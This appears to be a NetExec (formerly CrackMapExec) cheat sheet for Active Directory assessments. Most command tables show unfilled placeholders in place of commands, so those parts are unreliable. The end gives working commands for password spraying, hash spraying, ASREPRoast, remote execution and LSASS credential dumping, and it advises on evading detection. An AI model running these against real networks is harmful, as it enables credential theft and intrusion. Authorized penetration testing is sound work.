NetExec

NetExec (formerly CrackMapExec) is a post-exploitation tool that helps automate security assessments of large Active Directory networks through network protocol abuse and credential attacks.

Installation and Configuration

Command Description
INLINE_CODE_4 Install NetExec via pip
INLINE_CODE_5 Install with pipx (recommended)
INLINE_CODE_6 Clone from GitHub
INLINE_CODE_7 Install from source
INLINE_CODE_8 Check installed version
INLINE_CODE_9 Display help information

Basic Usage

Command Description
INLINE_CODE_10 Scan SMB on subnet
INLINE_CODE_11 Authenticate with credentials
INLINE_CODE_12 Authenticate with NTLM hash
INLINE_CODE_13 Anonymous authentication
INLINE_CODE_14 Use target file

Protocol Support

SMB Protocol

Command Description
INLINE_CODE_15 Basic SMB enumeration
INLINE_CODE_16 Enumerate shares
INLINE_CODE_17 Enumerate users
INLINE_CODE_18 Enumerate groups
INLINE_CODE_19 Enumerate local groups
INLINE_CODE_20 Enumerate sessions
INLINE_CODE_21 Enumerate disks

WinRM Protocol

Command Description
INLINE_CODE_22 WinRM authentication
INLINE_CODE_23 Execute command
INLINE_CODE_24 Execute PowerShell script

LDAP Protocol

Command Description
INLINE_CODE_25 LDAP authentication
INLINE_CODE_26 Enumerate LDAP users
INLINE_CODE_27 Enumerate LDAP groups
INLINE_CODE_28 Enumerate computers

MSSQL Protocol

SSH Protocol

Command Description
INLINE_CODE_32 SSH authentication
INLINE_CODE_33 SSH key authentication
INLINE_CODE_34 Execute command

Authentication Methods

Password Authentication

Command Description
INLINE_CODE_35 Single credential
INLINE_CODE_36 Credential lists
INLINE_CODE_37 Password spraying
INLINE_CODE_38 User enumeration

Hash Authentication

Command Description
INLINE_CODE_39 NTLM hash
INLINE_CODE_40 LM:NTLM hash
INLINE_CODE_41 Hash lists

Kerberos Authentication

Command Description
INLINE_CODE_42 Kerberos authentication
INLINE_CODE_43 Use Kerberos cache
INLINE_CODE_44 Force Kerberos

Enumeration

Share Enumeration

Command Description
INLINE_CODE_45 List shares
INLINE_CODE_46 Authenticated share listing
INLINE_CODE_47 Spider share contents
INLINE_CODE_48 Search for files

User Enumeration

Command Description
INLINE_CODE_49 Enumerate users
INLINE_CODE_50 RID bruteforce
INLINE_CODE_51 RID range

Group Enumeration

Command Description
INLINE_CODE_52 Enumerate groups
INLINE_CODE_53 Local groups
INLINE_CODE_54 Specific group

Computer Enumeration

Command Description
INLINE_CODE_55 Enumerate computers
INLINE_CODE_56 SMB computer enumeration

Command Execution

SMB Command Execution

Command Description
INLINE_CODE_57 Execute command
INLINE_CODE_58 Execute PowerShell script
INLINE_CODE_59 Use WMI execution
INLINE_CODE_60 Use SMB execution

WinRM Command Execution

Command Description
INLINE_CODE_61 PowerShell command
INLINE_CODE_62 Execute script

Modules

Built-in Modules

Command Description
INLINE_CODE_63 Enhanced spidering
INLINE_CODE_64 Enumerate AV products
INLINE_CODE_65 Group Policy Preferences
INLINE_CODE_66 LSASS dumping
INLINE_CODE_67 Mimikatz execution

Module Options

Command Description
INLINE_CODE_68 Module options
INLINE_CODE_69 Bloodhound output

Database Operations

Command Description
INLINE_CODE_70 Export to CSV
INLINE_CODE_71 Database management
INLINE_CODE_72 Set workspace
INLINE_CODE_73 Clear database

Advanced Features

Credential Stuffing

Command Description
INLINE_CODE_74 Continue on success
INLINE_CODE_75 Fail limit

Password Policy

Command Description
INLINE_CODE_76 Get password policy
INLINE_CODE_77 LDAP password policy

Bloodhound Integration

Command Description
INLINE_CODE_78 Collect Bloodhound data
INLINE_CODE_79 All collections

ASREPRoast

Kerberoasting

Command Description
INLINE_CODE_82 Kerberoasting attack

Output and Logging

Command Description
INLINE_CODE_83 Verbose output
INLINE_CODE_84 Debug output
INLINE_CODE_85 Save output to file
INLINE_CODE_86 Log directory

Configuration

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Protocol-specific Options

Command Description
INLINE_CODE_87 Custom port
INLINE_CODE_88 Connection timeout
INLINE_CODE_89 Thread count

Evasion Techniques

Command Description
INLINE_CODE_90 Random delay
INLINE_CODE_91 Fixed delay
INLINE_CODE_92 Obfuscation

Common Attack Scenarios

Domain Enumeration

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol

Credential Attacks

# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt

Post-Exploitation

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integration with Other Tools

Impacket Integration

Command Description
INLINE_CODE_93 Use Impacket WMI
INLINE_CODE_94 Use Impacket SMB

Crackmapexec Migration

Command Description
INLINE_CODE_95 Convert CME database
INLINE_CODE_96 Create alias for compatibility

Troubleshooting

Command Description
INLINE_CODE_97 General help
INLINE_CODE_98 Protocol-specific help
INLINE_CODE_99 Version information
INLINE_CODE_100 Debug mode

Best Practices

  • Use authentication before enumeration when possible
  • Implement appropriate delays to avoid detection
  • Use workspaces to organize different engagements
  • Export results for further analysis
  • Combine with other tools for a comprehensive assessment
  • Monitor for defensive responses
  • Use appropriate thread counts to avoid overwhelming targets
  • Implement proper logging for documentation
  • Validate credentials before large-scale attacks
  • Use obfuscation techniques when necessary

Security Considerations

  • Use only on authorized networks
  • Implement proper access controls
  • Monitor for detection by security tools
  • Apply least-privilege principles
  • Document all activities for compliance
  • Coordinate with the blue team when appropriate
  • Apply proper cleanup procedures
  • Store credentials securely
  • Use encrypted communication when possible
  • Update regularly to maintain effectiveness